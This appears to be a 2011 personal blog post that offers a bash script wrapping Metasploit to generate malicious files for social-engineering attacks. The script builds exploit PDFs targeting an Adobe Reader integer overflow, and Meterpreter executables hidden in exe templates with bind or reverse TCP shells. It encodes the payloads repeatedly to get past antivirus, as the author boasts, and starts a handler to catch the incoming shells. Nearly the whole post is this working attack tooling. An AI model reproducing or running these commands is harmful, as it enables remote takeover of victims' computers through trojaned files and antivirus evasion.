Friday, August 26, 2011

Bash Scripts

I have been practicing more metasploit and bash scripting.  I came up with a quick script for client side exploits.  It is not mind blowing or anything, but it is nice for a quick file with SE. It encodes enough to get past most AV and will start the multi handler to accept incoming/outgoing connections.  I am sure to add to it later but this is just a starting point.  Have to start somewhere....



#! /bin/sh

#This will create a "special" payload for you. Helps when you want to create Meterpreter files fast.... 

echo "Do you need a pdf or exe 'special' payload?"
read special
if [ $special == "pdf" ]; then
    echo "What is the pdf payload, bind_tcp or reverse_tcp?"
    read Payload
    echo "Remember: This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3."
    if [ $Payload == "bind_tcp" ]; then
        echo "What is the rhost IP address?"         
        read rhostip
        echo "What is the port we will bind to?"         
        read Port
        ls /root/pdf_metasploit/
        echo "What name do you want to use for the PDF?"
        read pdf_file
        msfcli exploit/windows/fileformat/adobe_libtiff FILENAME=/root/pdf_metasploit/$pdf_file PAYLOAD=windows/meterpreter/bind_tcp LPORT=$Port RHOST=$rhostip E
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=$Port RHOST=$rhostip E
    elif [ $Payload == "reverse_tcp" ]; then
        echo "What is the lhost IP address?"         
        read lhostip
        echo "What is the port we will bind to?"         
        read Port
        ls /root/pdf_metasploit/
        echo "What name do you want to use for the PDF?"
        read pdf_file
        msfcli exploit/windows/fileformat/adobe_libtiff FILENAME=/root/pdf_metasploit/$pdf_file PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$Port LHOST=$lhostip E
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$Port LHOST=$lhostip E
    else
        echo "Did not recognize you response. Please run script again. "
    fi

elif [ $special == "exe" ]; then
echo "Do you want the file to execute the payload in a separate process? Yes or No?"
read answer
if [ $answer == "Yes" ] || [ $answer == "yes" ]; then
    echo "What is the exe payload, bind_tcp or reverse_tcp?"
    read Payload
    if [ $Payload == "bind_tcp" ]; then
        echo "What is the rhost IP address?"         
        read rhostip
        echo "What is the port we will bind to?"         
        read Port
        ls /root/exe_template/
        echo "Which exe template do you want to use?"
        read exefile
        msfvenom -p windows/meterpreter/bind_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' -i 18 LPORT=$Port -k -x /root/exe_template/$exefile > /root/Desktop/bind.exe
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=$Port RHOST=$rhostip E           
    elif [ $Payload == "reverse_tcp" ]; then
        echo "What is the lhost IP address?"         
        read lhostip
        echo "What is the port we will connect to?"         
        read Port
        ls /root/exe_template/
        echo "Which exe template do you want to use?"
        read exefile
        msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' LHOST=$lhostip LPORT=$Port -i 18 -k -x /root/exe_template/$exefile > /root/Desktop/reverse.exe   
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$Port LHOST=$lhostip E
    else
        echo "Did not recognize you response. Please run script again. "
    fi

elif [ $answer == "No" ] || [ $answer == "no" ]; then
    echo "What is the exe payload, bind_tcp or reverse_tcp?"
    read Payload
    if [ $Payload == "bind_tcp" ]; then
        echo "What is the rhost IP address?"         
        read rhostip
        echo "What is the port we will bind to?"         
        read Port
        ls /root/exe_template/
        echo "Which exe template do you want to use?"
        read exefile
        msfvenom -p windows/meterpreter/bind_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' -i 18 LPORT=$Port -x /root/exe_template/$exefile > /root/Desktop/bind.exe
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=$Port RHOST=$rhostip E           
       
    elif [ $Payload == "reverse_tcp" ]; then
        echo "What is the lhost IP address?"         
        read lhostip
        echo "What is the port we will connect to?"         
        read Port
        ls /root/exe_template/
        echo "Which exe template do you want to use?"
        read exefile
        msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' LHOST=$lhostip LPORT=$Port -i 18 -x /root/exe_template/$exefile > /root/Desktop/reverse.exe   
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$Port LHOST=$lhostip E
    else
        echo "Did not recognize you response. Please run script again. "
    fi
else
    echo "Did not recognize you response. Please run script again. "
fi

else
    echo "Did not recognize you response. Please run script again. "
fi

No comments:

Post a Comment